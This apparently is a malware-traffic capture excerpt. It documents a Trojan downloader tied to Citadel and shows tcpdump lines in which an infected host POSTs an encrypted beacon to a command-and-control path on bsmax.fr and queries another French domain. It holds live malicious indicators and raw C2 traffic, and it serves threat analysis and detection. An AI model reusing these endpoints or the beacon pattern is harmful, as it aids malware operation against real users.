DLL.exe Trojan Downloader Loads Citadel and Unknown Malware PCAP file download 2016-09-20 02:28:08.567628 IP 192.168.1.102.58384 > 213.186.33.19.80: Flags [P.], seq 0:694, ack 1, win 256, length 694: HTTP: POST /misc/.KhJh2M@/.KhJh2M@//framework.php HTTP/1.1 E…st………f..!….P..(…d.P…~…POST /misc/.KhJh2M@/.KhJh2M@//framework.php HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Host: bsmax.fr Content-Length: 415 Connection: Keep-Alive Cache-Control: no-cache Cookie: 60gpBAK=R1224197954; 60gp=R1864059519 8.,…….@M0..GH.#..RS.. ..g.2..g…;…yLb…..]\..p..4…..Qo..t..Ba……..N..\.p’~.X.o.}z*…[…jA…L…#..T……..hq.$.zx[……!..Z.{D4.o.r..~)..z?.M.h.%……,.`O…=bpI}..V/UJ._XX..0v9..C.d.b…3..f.{}…………..i1…Y…<….5IR&.”…9EX\.h..X.f…Z..*.)Q.1…k?tf#[@.^..W…….+.J..Rg…..}….2…y..:…;..I;…,…..H.}….{8..,…&#(*.Pp…*…#..I…7.Y2..L.m…./…a…8…………….a.2. 2016-09-20 02:28:08.854990 IP 192.168.1.102.51387 > 75.75.75.75.53: 10218+ A? judo-club-solesmois-59.fr. (43) E..G,……~…fKKKK…5.39]’…………judo-club-solesmois-59.fr….. 2016-09-20 02:28:08.894800 IP 192.168.1.102.58384 > 213.186.33.19.80: Flags [.], ack 407, win 255, length 0 E..(su………f..!….P..*…e.P…?G…….. 2016-09-20 02:28:09.049012 IP 192.168.1.102.58385 > 213.186.33.3.80: Flags [S], seq 1303459062, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], […]